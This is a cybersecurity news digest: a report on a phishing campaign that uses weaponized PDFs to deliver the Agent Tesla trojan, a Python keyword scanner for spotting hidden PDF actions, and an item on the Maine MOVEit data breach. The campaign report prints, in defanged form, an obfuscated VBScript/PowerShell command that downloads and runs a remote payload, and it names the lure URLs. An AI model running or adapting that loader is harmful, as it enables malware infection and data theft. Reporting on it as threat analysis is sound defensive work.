Ukraine wages a war of attrition, the Kerch Strait Bridge is dropped again, and Russia seems to be purging its general officers. The FSB’s Gamaredon is showing renewed activity.
The CyberWire
Hackers Attacking Online Ticket Booking Users Using Weaponized PDF Files
Threat actors use weaponized PDF files to exploit software vulnerabilities, enabling them to execute malicious code on a target system.
PDFs provide a common and trusted format that makes them effective vehicles for delivering malware or launching phishing attacks.
Moreover, their ability to embed scripts and multimedia elements also increases the potential for exploitation.
Cybersecurity researchers at Forcepoint recently discovered that hackers actively attack online ticket-booking users using weaponized PDF files.
New malware versions appear daily, and their authors keep finding new ways to spread them. In this campaign, threat actors lure users with attachments that appear to come from various service providers.
The attachment is a PDF delivered by email that ultimately downloads a RAT to infect the system.
The execution chain is as follows:
Researchers analyzed the PDFs for malicious attributes, using PDFiD for static analysis (scanning for suspicious keywords) and pdf-parser, which revealed /ObjStm object streams hiding scripts and URLs. The PDF uses two methods to fetch the next-stage payload:
A fake pop-up triggers a URL action [/URI/Type/Action/URI (hxxps://bit[.]ly/newbookingupdates)] that redirects to hxxps://bio0king[.]blogspot[.]com/ to download the JavaScript payload.
Embedded VBScript (ExecuteGlobal) or JavaScript code directly fetches the final-stage remote PowerShell payload:
(vbscript:ExecuteGlobal(“CreateObject(“”WScript.Shell””).Run””powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm htloctmain25[.]blogspot[.]com//////////////atom.xml) | . (‘i*&*&&*x’).replace(‘*&*&&*’,’e’);Start-Sleep -Seconds 5″”,0:Close”))/F (\..\..\..\Windows\System32\mshta)>>”
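As an added illustration of the PDFiD-style static analysis described above (this is example code, not the Forcepoint researchers' or the article's own tooling), the scanner below counts the same keywords, inflates FlateDecode streams so that names hidden inside /ObjStm object streams become visible, and runs on a constructed sample whose /URI action only appears after inflation. The sample's URL and object layout are invented.

```python
import re
import zlib

# PDFiD keywords relevant to the campaign: object streams (which can hide content),
# scripting hooks, and actions that open URLs or launch programs.
KEYWORDS = (b"/ObjStm", b"/JS", b"/JavaScript", b"/OpenAction", b"/AA",
            b"/URI", b"/Launch", b"/EmbeddedFile")

# A dictionary (one level of nesting allowed) directly followed by a stream body.
STREAM_RE = re.compile(rb"<<((?:[^<>]|<<[^<>]*>>)*)>>\s*stream\r?\n(.*?)endstream", re.S)

def count_keywords(data: bytes) -> dict:
    """Count each keyword as PDFiD does: the name token must not continue with letters."""
    return {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z])", data))
            for k in KEYWORDS}

def inflate_streams(data: bytes) -> bytes:
    """Inflate every /FlateDecode stream so keywords inside /ObjStm become visible."""
    out = []
    for dictionary, body in STREAM_RE.findall(data):
        if b"/FlateDecode" in dictionary:
            try:
                # decompressobj tolerates the stray EOL the regex may capture after the data
                out.append(zlib.decompressobj().decompress(body))
            except zlib.error:
                pass  # corrupt or deliberately malformed stream: hand it to pdf-parser instead
    return b"".join(out)

def scan_pdf(data: bytes) -> dict:
    """Raw counts, counts after inflating streams, and keywords found only after inflating."""
    raw = count_keywords(data)
    inflated = count_keywords(inflate_streams(data))
    hidden = [k for k, n in inflated.items() if n and not raw[k]]
    return {"raw": raw, "inflated": inflated, "hidden_only": hidden}

def build_sample() -> bytes:
    """Constructed test file, not an artefact from the campaign: the /URI action sits only
    inside a FlateDecode object stream, so a raw keyword scan never sees it."""
    hidden = b"<< /Type /Action /S /URI /URI (https://example.invalid/booking-update) >>"
    body = zlib.compress(hidden)
    return (b"%PDF-1.7\n"
            b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>\nendobj\n"
            b"4 0 obj\n<< /Type /ObjStm /N 1 /First 0 /Filter /FlateDecode /Length "
            + str(len(body)).encode() + b" >>\nstream\n" + body + b"\nendstream\nendobj\n"
            b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")

if __name__ == "__main__":
    print(scan_pdf(build_sample()))  # hidden_only -> ['/URI']
```

A raw PDFiD run on such a file reports /ObjStm and /OpenAction but no /URI; the inflated pass is what exposes the action, which is why the researchers needed pdf-parser in addition to PDFiD.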
The PowerShell stage uses complex obfuscation and function replacement to hide and execute its malicious scripts. It modifies the registry, disables AMSI, adds AV exclusions, and bypasses security features.
The script alters the registry, services, and firewall settings, and it injects into processes such as Regsvcs.exe and MSBuild.exe.
It connects to “api[.]ipify[.]org”, steals data, and sends it to a private Telegram chat. The script also downloads additional payloads from “htljan62024[.]blogspot[.]com” for persistence.
After operations, it drops and executes a {random-name}.dll file, then self-deletes.
Agent Tesla malware surged during the pandemic, and its evolving tactics have persisted in recent years. The campaign involves a PDF in a phishing email from a fake travel agency.
Opening the PDF triggers JavaScript, leading to a multi-stage PowerShell script with advanced obfuscation.
De-obfuscation reveals the techniques used to load Agent Tesla. Successful infiltration enables data theft and command execution on compromised systems.
Cyber Security News
State of Maine data breach impacts 1.3 million people
The US State of Maine says it has suffered a data breach impacting around 1.3 million people. According to the census from July 2022, that’s more or less the entire population of Maine.
The State of Maine says it was compromised via a known vulnerability in secure transfer service MOVEit Transfer. This vulnerability is known to be used by the Cl0p ransomware gang.
The type of stolen data varies from person to person, likely because the data breach affected multiple agencies in the State. More than 50% of the data exposed in the breach came from Maine’s Department of Health and Human Services, while between 10 and 30% came from the state’s Department of Education. The breach also impacted several other departments.
From what we can gather, the cybercriminals may have obtained names, Social Security numbers (SSN), dates of birth, driver’s licenses, state identification numbers, and taxpayer identification numbers. For some individuals, the stolen data may also include certain types of medical information and health insurance details.
Progress Software, who make MOVEit Transfer, issued a patch for the exploited vulnerability on May 31, 2023. However, the State of Maine says the cybercriminals gained access and started downloading files between May 28 and 29, 2023, before the patch was available.
The State of Maine is encouraging people to contact Maine’s dedicated call center to find out if their data was involved or if they have questions about this incident. The phone number is (877) 618-3659, with representatives available from Monday to Friday, 9 AM to 9 PM ET.
If your Social Security Number or taxpayer identification number is involved, the call center will provide you with a complimentary credit monitoring code which gives you two years of credit monitoring and identity theft protection services.
If you suspect your data has been stolen, it’s worth watching out for people posing as the State of Maine. There’s nothing like a data breach to bring out the scammers, and they will be looking to target people affected by the breach. If someone does contact you, verify that they are who they say they are using another communication channel. Watch out for phishing emails, too.
Malwarebytes